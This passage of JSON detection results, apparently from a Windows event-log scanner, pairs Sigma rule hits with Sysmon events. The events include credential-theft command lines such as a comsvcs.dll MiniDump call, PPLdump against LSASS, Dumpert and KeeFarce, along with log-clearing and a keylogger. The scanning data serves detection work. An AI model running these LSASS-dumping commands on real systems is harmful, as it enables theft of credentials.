19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution":{"#attributes":{"ProcessID":344,"ThreadID":2032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"}},"Version":2}}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":928}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"}},"Version":5}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":4120}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"}},"Version":3}}}},{"detection":["Process Dump via Comsvcs DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution":{"#attributes":{"ProcessID":3292,"ThreadID":928}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution":{"#attributes":{"ProcessID":8,"ThreadID":6640}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"PPLdump.exe -v lsass lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"}},"Version":5}}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 22:09:35.263"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564605,"Execution":{"#attributes":{"ProcessID":3352,"ThreadID":4696}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-22T22:09:35.284225Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-09-28 12:47:36.624","Image":"C:\\WINDOWS\\system32\\rdrleakdiag.exe","ProcessGuid":"BC47D85C-DB68-5F71-0000-0010B237AB01","ProcessId":3352,"RuleName":"","TargetFilename":"C:\\Users\\wanwan\\Desktop\\minidump_668.dmp","UtcTime":"2020-09-28 12:47:36.624"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-PIU87N6","Correlation":null,"EventID":11,"EventRecordID":5229,"Execution":{"#attributes":{"ProcessID":2848,"ThreadID":2328}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-28T12:47:36.630448Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198238040,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":2028}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-25T09:09:14.916619Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"}}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":769792,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":7672}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-17T10:57:37.013214Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"KeeFarce.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40","Image":"C:\\Users\\Public\\KeeFarce.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A19B-5CC4-0000-0020A8FF0000","LogonId":"0xffa8","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-A22D-5CC4-0000-0010E2830900","ParentProcessId":3680,"ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"technique_id=T1036,technique_name=Masquerading","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-27 18:47:00.046"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7020,"Execution":{"#attributes":{"ProcessID":1816,"ThreadID":1228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T18:47:00.046849Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747","Image":"C:\\Users\\Public\\KeeFarce.exe","ImageLoaded":"C:\\Users\\Public\\BootstrapDLL.dll","ProcessGuid":"365ABB72-A3A4-5CC4-0000-001084960C00","ProcessId":1288,"Product":"?","RuleName":"creddump - keefarce HKTL","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-04-27 18:47:00.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7022,"Execution":{"#attributes":{"ProcessID":1816,"ThreadID":1228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T18:47:00.062474Z"}},"Version":3}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Users\\administrator\\Desktop\\x64\\Outflank-Dumpert.exe","ProcessGuid":"ECAD0485-88C9-5D0C-0000-0010348C1D00","ProcessId":3572,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:37.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238375,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:37.329185Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.258"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238380,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:50.259077Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Dumpert Process Dumper","LSASS Memory Dump File Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 06:53:03.227","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"ECAD0485-88D6-5D0C-0000-001007AA1D00","ProcessId":1568,"RuleName":"","TargetFilename":"C:\\Windows\\Temp\\dumpert.dmp","UtcTime":"2019-06-21 07:35:50.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238383,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:35:50.729226Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-21 07:36:50.985","Image":"C:\\Users\\administrator\\Desktop\\AndrewSpecial.exe","ProcessGuid":"ECAD0485-8912-5D0C-0000-0010FD2F1F00","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\Desktop\\Andrew.dmp","UtcTime":"2019-06-21 07:36:50.985"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":238387,"Execution":{"#attributes":{"ProcessID":1560,"ThreadID":2316}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-21T07:36:51.681567Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Version","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5589,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Name","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5590,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"KEYLOGGER_DIRECTX.EXE4755D1CB0002A410","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\Id","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5591,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\keylogger_directx.exe","ProcessGuid":"365ABB72-B138-5C8E-0000-001004F51200","ProcessId":848,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\DirectInput\\MostRecentApplication\\MostRecentStart","UtcTime":"2019-03-17 20:42:51.494"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5592,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:42:51.504059Z"}},"Version":2}}}},{"detection":["Accessing WinAPI in PowerShell","Malicious PowerShell Keywords","PowerShell Get-Process LSASS in 